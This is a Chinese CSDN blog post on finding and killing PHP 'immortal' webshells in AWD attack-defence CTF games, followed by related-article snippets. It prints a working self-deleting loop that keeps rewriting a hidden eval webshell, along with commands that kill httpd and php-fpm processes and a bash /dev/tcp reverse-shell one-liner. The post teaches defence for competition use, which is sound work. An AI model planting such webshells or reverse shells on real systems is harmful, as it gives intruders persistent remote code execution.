不死马php如何取证_干掉 PHP 不死马

最新推荐文章于 2024-07-22 11:10:25 发布
最新推荐文章于 2024-07-22 11:10:25 发布
阅读量899 收藏 1
点赞数 1
文章标签: 不死马php如何取证
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39880621/article/details/113551493
版权
本文探讨了PHP不死马的定义、行为特征,并区分了两种类型。在AWD模式下,不死马的存在可能导致资源占用或后门留存。介绍了php-apache和php-fpm两种运行模式下的处理不死马的方法,包括通过PHP脚本杀掉相关进程,以及利用shell进行更灵活的控制。
摘要由CSDN通过智能技术生成

2ff34e647e2e3cdfd8dca593e17d9b0a.png

在 AWD 模式下经常碰到不死马, 不干掉的话就会一直被偷 flag, 很难受. 所以研究一下怎么干掉.

什么是不死马

先说一下什么是不死马, 比如这种1

2

3

4

5

6

7

8

9

10set_time_limit(0);

ignore_user_abort(1);

unlink(__FILE__);

while (1) {

$content = "<?php error_reporting(0);if(sha1($_POST['pwd'])==='%pwd%'){eval($_POST['cmd']);}?>";

file_put_contents(".shell.php", $content);

usleep(10000);

}

?>

简单来说有以下特性:访问后删除自己

即使断开连接也不会停止

驻留在内存中定时做某些事情, 比如上面这种就是不停的写 webshell

根据行为也可以将不死马分为两种, 一种是 while(1) 不 sleep, 占用服务器资源, 卡机子, 还有一种是 sleep, 悄悄的留后门

如果不懂怎么干掉的话, 唯一的办法就是重启环境了, 而这在 AWD 中一般都是会倒扣不少分的…

接下来了解一下 php 主流的两种运行模式 php-fpm 与 php-apache 这两种,

php-fpm 适用于 nginx 和 apache 而 php-apache 自然是只能 apache 使用,

其中 fpm 的性能更好, 但是配置较为复杂(其实也不是很复杂 233), 在 AWD 我只遇见过 php-apache 这种 0.0

但是其实要干掉不死马, 步骤都差不多

干掉不死马

php-apache

在这种模式下, 会在 fork 的一个 apache 进程里面以低权限用户来处理 php, 如下图

b5d4494ea887642b62c7042ca75878c2.png

我们只要杀掉所以这些进程就行, 但在 AWD 中一般是没 root 权限的, 我们要干掉这些只能以低权限的身份来. 这里有两种办法给自己在 web 目录下写一个 php, 里面是1

2system("kill `ps -ef | grep httpd | grep -v grep | awk '{print $2}'`");

如果觉得碰到不死马了就直接访问, 杀掉所有 httpd 进程, 因为权限不够, root 的不会被杀掉, 这个守护进程会自动再 fork 进程, 不用担心服务挂写个 php 给自己弹个 shell, 在 shell 里面 killall, 这个更方便一点, 也更灵活1

2system("bash -i >& /dev/tcp/127.0.0.1/23333 0>&1");

php-fpm

其实跟上面差不多, 只是进程名不同, 因为 fpm 是独立的服务, 不同于上面 apache 里面直接调用 php 的 api

e96755f1ec2b1c5499358252f76af890.png1

2system("kill `ps -ef | grep php-fpm | grep -v grep | awk '{print $2}'`");

weixin_39880621
关注
不死马php如何取证_不死马 - Unixcs - 博客园
weixin_39805720的博客
12-21 330
什么是不死马?内存马,通俗讲就是不死马,就是会运行一段永远不退出的程序常驻在PHP进程里,无限执行。生成过程不死马.php → 上传到server → server执行文件 → server本地无限循环生成 (一句话.php)两种不死马网上流传的不死马ignore_user_abort(true);set_time_limit(0);unlink(__FILE__);$file = '...
php不死马如何kill,awd攻防之kill 不死马
weixin_33278577的博客
03-22 1758
1.pwn题目题目预设条件:官方给了一个ctf用户给我们,并且用一个root权限的守护进程去监听一个给定的端口,并且会不断以test用户启动名为game的服务(题目)。ctf用户可以直接使用 su test 切换到test用户。这样一个环境可以用这样一条命令去完成:sudo socat tcp4-listen:2019,fork exec:"sudo -u test ./game"#注:后面的ga...
awd网络攻防赛常用的不死马,超强
10-30
以上是不死马的代码,pass=R_Hacker. 采用了md5加密。
PHP不死马
qq_50822277的博客
07-22 290
php不死马,下面只是基础不死马。可以根据自己要求自行更改和改进。缺点:重启服务,即可删除,但是灵活性高。
不死马
strider1123的博客
08-01 208
不死马感觉挺有用的,先了解了解,早晚会用到 先来了解下不死马“不死”的原理 不死马与普通一句话的区别在于,不死马本身并不是用来连接的,而是创建一个不断生成另一个一句话的进程,我们需要连接的是另一个被创建出来的一句话木马文件 来看一个普通的不死马 <?php set_time_limit(0); //用来让这个php文件能永久执行,否则会有...
关于PHP不死马的分析和总结
weixin_52501704的博客
10-16 2035
关于PHP不死马的分析和总结
不死马php如何取证_awd的防御脚本以及查杀不死马测试
weixin_39682944的博客
01-12 1109
防御脚本github上的awd通防脚本三个。一个记录敏感请求,一个记录所有的东西。一个是waf,针对sql注入的。wafjk.phpwafjk.php是用来记录敏感操作的,可以自行修改pattern,增加更多的敏感函数,只要匹配到,就会记录下来敏感操作。首先我在index.php包含了include "wafjk.php";...
WR340G+_编程器固件_8M_不死UBOOT_Gargoyle_石像鬼1.8.1
02-02
Gargoyle_石像鬼18.1版 8m编程器固件 包含中文语言包 集成不死UBOOT 适用于如下路由或AR231x+88e6060方案的路由 TP: 340G 340G+ 541G 541G+ 641G 641G+ DIR3001 水星: mw54r MW108R 迅捷: FW54R
不死U-Boot_最终版2015-04-27_可直刷Breed
03-01
这是2015-04-27的u-boot,H大最后一个U-Boot版本,可直接刷breed,其它u-boot版会有64整数的文件大小验证不能直接刷breed,其它版u-boot可先刷最后这版u-boot后再刷breed。此版u-boot和breed可互刷,十分方便。
WR340G+_编程器固件_8M_不死UBOOT_OPENWRT_14.0
02-02
14.0 BB版 openwrt 8m 编程器固件 集成不死UBOOT 适用于如下路由或AR231x+88e6060方案的路由 TP: 340G 340G+ 541G 541G+ 641G 641G+ DIR3001 水星: mw54r MW108R 迅捷: FW54R
WR340G+_编程器固件_8M_不死UBOOT_OPENWRT_12.0
02-02
12.0 BB版 openwrt 8m 编程器固件 集成不死UBOOT 适用于如下路由或AR231x+88e6060方案的路由 TP: 340G 340G+ 541G 541G+ 641G 641G+ DIR3001 水星: mw54r MW108R 迅捷: FW54R
不死马php如何取证_php不死马如何删除
weixin_39669075的博客
12-21 438
什么是不死马?内存马,通俗讲就是不死马,就是会运行一段永远不退出的程序常驻在PHP进程里,无限执行。生成过程 (推荐学习:PHP视频教程)不死马.php → 上传到server → server执行文件 → server本地无限循环生成 (一句话.php)网上流传的不死马...
Php-不死马的权限维持
mingyqf的博客
02-18 736
转发自知乎: https://zhuanlan.zhihu.com/p/420615927 侵删 大家在渗透测试中,碰到java的程序,都会打上一个内存马 但是在php的程序中很少有这种webshell/维持方式,/无主文件落地的方式 接下来就让小编带你聊聊,php不死马的权限维持,其实早在之前比较火 0x01 PHp - 不死马(内存马) 在实战当中,现在很少有人用不死马了,其实可以有效的去用来做一些防护的绕过。也加大了一些溯源的难度,和宿主检测webshell的难度 第一种, 是把木马通过写入的方
Windows权限维持之php不死马、映像劫持、策略组脚本
Longwaer
01-09 1307
通过学习掌握Windows权限维持手段,提升在个人知识小技巧,更快的知晓权限维持的作用性。
不死马php如何取证_不死马 - 高诺琪 - 博客园
weixin_39849671的博客
12-21 301
借鉴文章不死马常用于AWD模式,用于权限维持,首先上传一个不死马,然后访问该页面,就会执行不死马,它会以进程的形式运行,不断的生成文件,即使被发现也不容易被删掉,同时注意上传的目录是否有权限不死马ignore_user_abort(1); //ignore_user_abort如果设置为 TRUE,则忽略与用户的断开,脚本将继续运行。unlink(__FILE__); //删除自身whi...
如何删除不死马
黑锤的博客
11-25 5326
当自己的服务器被别人上传了不死马,如何应对呢? 第一个方法就是,重启自己的服务,这样不死马就没有了,就不会再生成了,毕竟不死马是在内存当中的。 第二种方法就是用命令将在内存中的进程删除; kill -9 -1 这个命令可以杀掉当前用户下面的所有进程,当然就可以把不死马杀掉。 可以使用 ps aux 命令 列出所有进程,找到要杀掉的进程运用命令: kill pid 就可以了 可以使用...
不死马原理
看不尽的尘埃——博客
11-19 4471
前言 首先普及一下木马、病毒和后门的概念。 木马 除具有以上功能外还具有主动攻击性,就是说感染木马后,木马传输者可以远程控制你的计算机,在你不知道的情况下查看你的隐私文件,资料等......... 后门 后门,本意是指一座建筑背面开设的门,通常比较隐蔽,为进出建筑的人提供方便和隐蔽。在信息安全领域,后门是指绕过安全控制而获取对程序或系统访问权的方法。后门的最主要目...
渗透测试-不死马的创建和查杀
lza20001103的博客
09-01 2384
不死马的创建和查杀 文章目录不死马的创建和查杀0x00 创建0x01 查看0x02 查杀root用户角度的查杀:重启web服务。其他用户的查杀: 0x00 创建 md5加密密码: 代码: <?php ignore_user_abort(true); set_time_limit(0); unlink(__FILE__); $file = '.shell.php'; $code = '<?php if(md5($_GET["pass"])=="2591c98b70119fe624898b1e4
如何查杀php不死马
最新发布
09-29
"不死马"通常是指 PHP 的一种恶意脚本,也称为 "Baidu Spider Trap" 或 "Bad Bots Protection",它会消耗大量服务器资源,阻止搜索引擎爬虫访问网站。以下是一些常见的方法来检测和清除这种恶意代码: 1. **检查...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值